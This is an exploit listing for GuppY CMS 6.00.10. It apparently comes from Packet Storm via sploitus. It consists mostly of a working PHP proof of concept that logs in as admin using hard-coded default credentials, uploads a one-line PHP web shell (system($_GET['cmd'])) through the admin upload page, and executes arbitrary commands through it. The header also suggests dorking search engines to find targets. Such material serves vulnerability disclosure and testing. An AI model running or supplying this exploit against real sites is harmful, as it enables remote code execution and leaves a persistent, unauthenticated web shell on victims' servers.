## https://sploitus.com/exploit?id=PACKETSTORM:212244
=============================================================================================================================================
| # Title : GuppY CMS 6.00.10 php Code Execution Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits) |
| # Vendor : https://www.freeguppy.org/ |
=============================================================================================================================================
POC :
[+] Dorking: find targets via Google or another search engine.
[+] Code Description: GuppY CMS version 6.00.10 suffers from an authenticated remote shell upload vulnerability: an account that can reach the admin upload page (guppy/admin/admin.php?pg=upload) can store a .php file under guppy/file/ and then execute it over HTTP. Valid admin credentials are therefore a precondition.
[+] Improvements (related: https://packetstorm.news/files/id/168584/ ; no CVE number is listed for this issue):
Fixed CURLOPT_* bugs.
Improved input checking (getopt).
Improved handling of cookie.txt using a temporary file.
Added urlencode($command) to ensure no problems with special characters.
Improved HTTP code checking and response more accurately.
[+] save code as poc.php.
[+] Usage : php poc.php -u http://target.org/ -c whoami
[+] PayLoad :
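#!/usr/bin/php
<?php
declare(strict_types=1);

// GuppY CMS 6.00.10 - authenticated (admin) file upload leading to RCE.
//
// Flow:
//   1. log in at guppy/connect.php with admin credentials (cookie kept in a temp jar),
//   2. POST a multipart upload of shell.php to the admin "upload" page, target folder "file",
//   3. request guppy/file/shell.php?cmd=<command> and print the response body.
//
// Options: -u <base url> -c <command> [-l <login>] [-p <password>]
// -l / -p are optional and default to the credentials the original PoC hard-coded.
//
// NOTE(review): step 2 leaves an unauthenticated web shell on the target;
// delete guppy/file/shell.php once the test is finished.

$options = getopt('u:c:l:p:') ?: [];
$target = $options['u'] ?? '';
$command = $options['c'] ?? '';
// empty() would also reject a legitimate "-c 0"; test for a non-empty string instead.
if (!is_string($target) || $target === '' || !is_string($command) || $command === '') {
    die("\n GuppY 6.00.10 CMS Remote Code Execution \n Usage : php exploit.php -u http://target.org/ -c whoami\n\n");
}
$username = is_string($options['l'] ?? null) ? $options['l'] : 'Admin';
$password = is_string($options['p'] ?? null) ? $options['p'] : 'rose1337';

// Accept both "http://host" and "http://host/" as the base URL.
$target = rtrim($target, '/') . '/';

// Session cookie jar in a private temp file; removed on every exit path.
$cookie = tempnam(sys_get_temp_dir(), 'cookie_');
if ($cookie === false) {
    die("\n[-] Could not create a temporary cookie file\n");
}
register_shutdown_function(static function () use ($cookie): void {
    if (is_file($cookie)) {
        unlink($cookie);
    }
});

$curlObj = curl_init();
// Options shared by all three requests. TLS peer verification is disabled on purpose
// (self-signed lab targets); this also makes the tool trivially MITM-able, so do not
// reuse the setting outside a test environment.
curl_setopt_array($curlObj, [
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_SSL_VERIFYPEER => false,
    CURLOPT_FOLLOWLOCATION => true,
    CURLOPT_CONNECTTIMEOUT => 10,
    CURLOPT_TIMEOUT => 10,
    CURLOPT_COOKIEJAR => $cookie,
    CURLOPT_COOKIEFILE => $cookie,
    CURLOPT_USERAGENT => 'Mozilla/5.0',
]);

// Executes the request currently configured on $curlObj and aborts on a transport
// error or a non-2xx status, so a failed step is never mistaken for success.
$request = static function (string $step) use ($curlObj): string {
    $response = curl_exec($curlObj);
    if ($response === false) {
        fwrite(STDERR, "\n[-] {$step} failed: " . curl_error($curlObj) . "\n");
        exit(1);
    }
    $code = curl_getinfo($curlObj, CURLINFO_HTTP_CODE);
    if ($code < 200 || $code >= 300) {
        fwrite(STDERR, "\n[-] {$step} failed! HTTP Code: {$code}\n");
        exit(1);
    }
    return $response;
};

// 1. Log in as admin. The form fields are URL-encoded so credentials containing
//    '&' or '=' are not split. A 2xx here only proves the request went through;
//    GuppY may answer 200 to a wrong password as well - the upload step is the real check.
curl_setopt_array($curlObj, [
    CURLOPT_URL => "{$target}guppy/connect.php",
    CURLOPT_POST => true,
    CURLOPT_POSTFIELDS => http_build_query([
        'connect' => 'on',
        'uuser' => 'old',
        'pseudo' => $username,
        'uid' => $password,
    ]),
]);
$request('Login');

// 2. Upload the web shell. The multipart body is assembled with CRLF line endings and
//    the mandatory blank line between each part's headers and its content; a body
//    with bare LF and no separator is rejected by most multipart parsers.
$boundary = '----WebKitFormBoundarygA1APFcUlkIaWal4';
$post = implode("\r\n", [
    "--{$boundary}",
    'Content-Disposition: form-data; name="rep"',
    '',
    'file',
    "--{$boundary}",
    'Content-Disposition: form-data; name="ficup"; filename="shell.php"',
    'Content-Type: application/x-php',
    '',
    '<?php system($_GET["cmd"]); ?>',
    "--{$boundary}--",
    '',
]);
curl_setopt_array($curlObj, [
    CURLOPT_URL => "{$target}guppy/admin/admin.php?lng=en&pg=upload",
    CURLOPT_POST => true,
    CURLOPT_POSTFIELDS => $post,
    CURLOPT_HTTPHEADER => [
        "Content-Type: multipart/form-data; boundary={$boundary}",
        'Accept-Encoding: gzip, deflate',
        'Accept-Language: en-US,en;q=0.9',
    ],
]);
$request('Upload');

// 3. Run the command through the uploaded shell. CURLOPT_HTTPGET resets the POST
//    state and CURLOPT_HTTPHEADER replaces the multipart Content-Type still attached
//    to the reused handle; CURLOPT_HEADER stays off so only the body is printed.
$shell = "{$target}guppy/file/shell.php?cmd=" . urlencode($command);
curl_setopt_array($curlObj, [
    CURLOPT_URL => $shell,
    CURLOPT_HTTPGET => true,
    CURLOPT_HTTPHEADER => ['Accept: */*'],
    CURLOPT_HEADER => false,
]);
$exec_shell = curl_exec($curlObj);
$code = curl_getinfo($curlObj, CURLINFO_HTTP_CODE);
if ($exec_shell === false || $code < 200 || $code >= 300) {
    echo "\n[-] Something went wrong! HTTP Code: $code\n";
} else {
    print("\n$exec_shell\n");
}
curl_close($curlObj);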
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================